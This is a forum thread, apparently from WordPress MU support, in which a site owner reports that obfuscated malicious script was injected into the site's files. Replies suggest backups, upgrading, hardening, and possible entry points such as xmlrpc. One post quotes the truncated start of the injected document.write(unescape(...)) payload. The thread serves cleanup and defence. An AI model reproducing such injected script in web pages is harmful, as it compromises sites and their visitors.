WordPress MU

(3 hour ago) In all files (php and html) in root directory the malicious code has been added. Access to the administrator panel has stopped. Blogs were displayed with php-warnings. As it happens knows nobody...

The beginning of a harmful code: <! - ae85dbc48cab8ca9cb12842273be8777-> <script> document.write (unescape ("%3Cscript%3Eif%28fX%21%3D1%29%7Bfunction%20ZXsyoS%28LsiVeGwvIp%29%7Breturn%20LsiVeGwvIp%7Dfunction%20TQB...

Removal from a file wpmu-setting.php has restored service capability.

The wpmu version 1.2.5а

The wpmu version 1.2.5а

Upgrading when the newer version came out last month may have been a good idea.

http://codex.wordpress.org/Hardening_WordPress

Not sure why you choose that specific file to remove as it's needed by mu.

Best bet would be to delete the files and replace them with your latest safe backup and upgrade to 1.3. Keeping an eye on the versions may be a good idea as well for future reference.

edit: Not sure what html files you're hinting at as there aren't any in the download.

So, did you have any plugins installed that let users run scripts?

Thanks. But how about xmlrpc in version 1.3? And other limits?

Html files it for installation cookie for Google Analitics - not to consider my traffic.

andrea_r, NO.
Users are not present in general. Plugins are disconnected for users. I use a little plugins only for the own blogs:
bad-behavior (for main site only)
redirection (test on one post of some blog)
signup-question (for main site only)

anarchy media (in mu-plugins)
feedback (in mu-plugins)
kb notify admin (in mu-plugins).

The site address: http://vlavla.com

Just a guess, but I would guess that they got in through your server (or some other app on the server) and not Mu...if it were Mu, we would be seeing a lot of this here and, to my knowledge, this is the first...at least that I can recall.

Steve

no, i got hacked once. it was from the xmlrpc issue, though.

I got lightly hacked early on as well.. it was a permissions/stupid password issue.